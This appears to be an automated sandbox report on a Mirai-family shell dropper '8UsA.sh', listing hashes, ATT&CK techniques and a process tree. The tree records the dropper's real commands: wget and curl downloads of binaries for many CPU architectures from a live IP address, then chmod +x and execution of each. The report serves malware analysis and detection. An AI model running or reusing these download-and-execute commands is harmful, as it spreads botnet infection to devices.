Analysis
-
max time kernel
34s -
max time network
52s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
20-11-2024 00:01
Static task
static1
Behavioral task
behavioral1
Sample
8UsA.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
8UsA.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
8UsA.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
8UsA.sh
Resource
debian9-mipsel-20240418-en
General
-
Target
8UsA.sh
-
Size
1KB
-
MD5
0b5a60057fc9d9ce95ba5cdaab501e68
-
SHA1
879040e7114865f81dbd3f2fb41409e0cb3b8966
-
SHA256
f31864614b06542c7128c1df20768c2f26464c32be9dd18b5e2c1252b3bb44f1
-
SHA512
d97b13f656458456b934ab1cdc205ec4efedebfa8ee98675ba38865e916563487d1fd5c649afad7376f469a60ecd16b7c502c549ac095d8be234f6d9e876f351
Malware Config
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 10 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 791 chmod 804 chmod 812 chmod 703 chmod 726 chmod 786 chmod 796 chmod 818 chmod 743 chmod 757 chmod -
Executes dropped EXE 10 IoCs
ioc pid Process /tmp/3AvA 704 3AvA /tmp/3AvA 728 3AvA /tmp/3AvA 744 3AvA /tmp/3AvA 758 3AvA /tmp/3AvA 787 3AvA /tmp/3AvA 792 3AvA /tmp/3AvA 797 3AvA /tmp/3AvA 805 3AvA /tmp/3AvA 813 3AvA /tmp/3AvA 819 3AvA -
Checks CPU configuration 1 TTPs 10 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 4 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 724 cat 728 3AvA 707 wget 716 curl -
Writes file to tmp directory 20 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/IGxModz.arm7 wget File opened for modification /tmp/IGxModz.mips wget File opened for modification /tmp/IGxModz.mpsl curl File opened for modification /tmp/IGxModz.arm6 curl File opened for modification /tmp/IGxModz.mpsl wget File opened for modification /tmp/IGxModz.arm5 wget File opened for modification /tmp/IGxModz.arm5 curl File opened for modification /tmp/IGxModz.ppc wget File opened for modification /tmp/IGxModz.m68k wget File opened for modification /tmp/IGxModz.x86 wget File opened for modification /tmp/IGxModz.x86 curl File opened for modification /tmp/IGxModz.mips curl File opened for modification /tmp/IGxModz.m68k curl File opened for modification /tmp/IGxModz.sh4 wget File opened for modification /tmp/IGxModz.arm7 curl File opened for modification /tmp/IGxModz.ppc curl File opened for modification /tmp/IGxModz.sh4 curl File opened for modification /tmp/3AvA 8UsA.sh File opened for modification /tmp/IGxModz.arm4 curl File opened for modification /tmp/IGxModz.arm6 wget
Processes
-
/tmp/8UsA.sh/tmp/8UsA.sh1⤵
- Writes file to tmp directory
PID:653 -
/usr/bin/wgetwget http://154.213.189.14/bns/IGxModz.x862⤵
- Writes file to tmp directory
PID:656
-
-
/usr/bin/curlcurl -O http://154.213.189.14/bns/IGxModz.x862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:683
-
-
/bin/catcat IGxModz.x862⤵PID:701
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh IGxModz.x86 systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-LgHo0I2⤵
- File and Directory Permissions Modification
PID:703
-
-
/tmp/3AvA./3AvA x862⤵
- Executes dropped EXE
PID:704
-
-
/usr/bin/wgetwget http://154.213.189.14/bns/IGxModz.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:707
-
-
/usr/bin/curlcurl -O http://154.213.189.14/bns/IGxModz.mips2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:716
-
-
/bin/catcat IGxModz.mips2⤵
- System Network Configuration Discovery
PID:724
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh IGxModz.mips IGxModz.x86 systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-LgHo0I2⤵
- File and Directory Permissions Modification
PID:726
-
-
/tmp/3AvA./3AvA mips2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:728
-
-
/usr/bin/wgetwget http://154.213.189.14/bns/IGxModz.mpsl2⤵
- Writes file to tmp directory
PID:731
-
-
/usr/bin/curlcurl -O http://154.213.189.14/bns/IGxModz.mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:740
-
-
/bin/catcat IGxModz.mpsl2⤵PID:742
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-LgHo0I2⤵
- File and Directory Permissions Modification
PID:743
-
-
/tmp/3AvA./3AvA mpsl2⤵
- Executes dropped EXE
PID:744
-
-
/usr/bin/wgetwget http://154.213.189.14/bns/IGxModz.arm42⤵PID:746
-
-
/usr/bin/curlcurl -O http://154.213.189.14/bns/IGxModz.arm42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:747
-
-
/bin/catcat IGxModz.arm42⤵PID:755
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh IGxModz.arm4 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-LgHo0I2⤵
- File and Directory Permissions Modification
PID:757
-
-
/tmp/3AvA./3AvA arm42⤵
- Executes dropped EXE
PID:758
-
-
/usr/bin/wgetwget http://154.213.189.14/bns/IGxModz.arm52⤵
- Writes file to tmp directory
PID:759
-
-
/usr/bin/curlcurl -O http://154.213.189.14/bns/IGxModz.arm52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:784
-
-
/bin/catcat IGxModz.arm52⤵PID:785
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh IGxModz.arm4 IGxModz.arm5 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-LgHo0I2⤵
- File and Directory Permissions Modification
PID:786
-
-
/tmp/3AvA./3AvA arm52⤵
- Executes dropped EXE
PID:787
-
-
/usr/bin/wgetwget http://154.213.189.14/bns/IGxModz.arm62⤵
- Writes file to tmp directory
PID:788
-
-
/usr/bin/curlcurl -O http://154.213.189.14/bns/IGxModz.arm62⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:789
-
-
/bin/catcat IGxModz.arm62⤵PID:790
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-LgHo0I2⤵
- File and Directory Permissions Modification
PID:791
-
-
/tmp/3AvA./3AvA arm62⤵
- Executes dropped EXE
PID:792
-
-
/usr/bin/wgetwget http://154.213.189.14/bns/IGxModz.arm72⤵
- Writes file to tmp directory
PID:793
-
-
/usr/bin/curlcurl -O http://154.213.189.14/bns/IGxModz.arm72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:794
-
-
/bin/catcat IGxModz.arm72⤵PID:795
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.mips IGxModz.mpsl IGxModz.x86 systemd-private-aaea58b58de5438c837e984796459c2c-systemd-timedated.service-LgHo0I2⤵
- File and Directory Permissions Modification
PID:796
-
-
/tmp/3AvA./3AvA arm72⤵
- Executes dropped EXE
PID:797
-
-
/usr/bin/wgetwget http://154.213.189.14/bns/IGxModz.ppc2⤵
- Writes file to tmp directory
PID:798
-
-
/usr/bin/curlcurl -O http://154.213.189.14/bns/IGxModz.ppc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:799
-
-
/bin/catcat IGxModz.ppc2⤵PID:803
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.x862⤵
- File and Directory Permissions Modification
PID:804
-
-
/tmp/3AvA./3AvA ppc2⤵
- Executes dropped EXE
PID:805
-
-
/usr/bin/wgetwget http://154.213.189.14/bns/IGxModz.m68k2⤵
- Writes file to tmp directory
PID:807
-
-
/usr/bin/curlcurl -O http://154.213.189.14/bns/IGxModz.m68k2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:808
-
-
/bin/catcat IGxModz.m68k2⤵PID:811
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.m68k IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.x862⤵
- File and Directory Permissions Modification
PID:812
-
-
/tmp/3AvA./3AvA m68k2⤵
- Executes dropped EXE
PID:813
-
-
/usr/bin/wgetwget http://154.213.189.14/bns/IGxModz.sh42⤵
- Writes file to tmp directory
PID:815
-
-
/usr/bin/curlcurl -O http://154.213.189.14/bns/IGxModz.sh42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:816
-
-
/bin/catcat IGxModz.sh42⤵PID:817
-
-
/bin/chmodchmod +x 3AvA 8UsA.sh IGxModz.arm4 IGxModz.arm5 IGxModz.arm6 IGxModz.arm7 IGxModz.m68k IGxModz.mips IGxModz.mpsl IGxModz.ppc IGxModz.sh4 IGxModz.x862⤵
- File and Directory Permissions Modification
PID:818
-
-
/tmp/3AvA./3AvA sh42⤵
- Executes dropped EXE
PID:819
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
139KB
MD5146a0bb5d835cff65a7c8b97ec3145de
SHA126569b4ff68b3fc8ed0ca5d17b74a77f159971cd
SHA2564436f0dd3e6566d029bc495a6035ee2f22c232f6d608370d621d898b2b76d95e
SHA5125c4f94c060c6e56236f58dec5cdbdad127d0bedf85f76afdd5165d75ec74ee16c54153cb270b1cb0f39c639d0352392d51aa0b25dfef229dea7f892d8e95d13c
-
Filesize
132KB
MD58a6923c24c3deffaba399ca545c19a45
SHA17be6ccbd8be63914c7b1c8a8593829be84d24350
SHA256bdd82dcb696e7b5f3554f81e2dce89a88a09571ddab8c2c89081511296379d96
SHA512be86626d2362e5129c6333b8c12040b0d75cce0ecf0e01830abe1b40f43d70fbdd5157df9d709e018ac4381ab6bf7f99b6e1fdb4939e12dbd7da8ab477e7efe1
-
Filesize
276B
MD5960b4fa9d5383373f0a1ea04929df01b
SHA1f78054d817db7742162a706b5d9f1fedcdf21140
SHA2563e3036a7715bae7bda5c0b2de74731a835b869ded4d470cddb7f6521114aca7a
SHA5122d5c6ad2bb0f8a8b971d759e3618e8636034cee5b76c362c2107b7fadc38bcaabbaa79cd19f5f2e949005e3d128b1a4efff187d1a3f035791dcbd1255b7ed73f
-
Filesize
49KB
MD52f09af4fa574eee01c552daa1631a404
SHA1a5fc3fdd3979ba7f01cf036ac4001b754ce54cac
SHA25665a8da0b02c02baf3e5c41028f91f6eaef118a35933e9df21069f599d111c474
SHA5125484b3960d2353aeeac7d5ccb854dedd28c5c9f6400c4262bbfe49ad11eb69d24436c0cc927fa18be39b2a3ff5ac3e1f89debbbfaa95d46c6b3012ef9476928f
-
Filesize
87KB
MD59cade77ffa8009fa3a857b37d20646ff
SHA1fb787ad30a834787722e2f7d0b8a2305c90fa31d
SHA2569345c1cd7fcbaa1de4691d36d9650f4e9ca833b209eb13a3f0a6602e26cb4517
SHA512be408bd542d1a117a1d78bd63ef522fb220b63cf66f810ff53b5e4726fed7a822763e395ea97f7a7134e2507f4804e55a1cf02a75f9ebeb0149992c302d0c013
-
Filesize
68KB
MD53babcad0786bd3ac084c3ef8bfeaf14f
SHA1362e7893d9faa99441e51580e36bc1a8499b0020
SHA256549428f4edfd5acb557015836a7bad388d5f812aa558c388f313a48aef2b480e
SHA512a503e6f09705a1f204da65a428983c5c46f395d22ea1c559bc1af0d8d19f2cb8eaced4f87e19d688770ee4f1000da6aa75fbf21f877daa475e9617d891d5e45f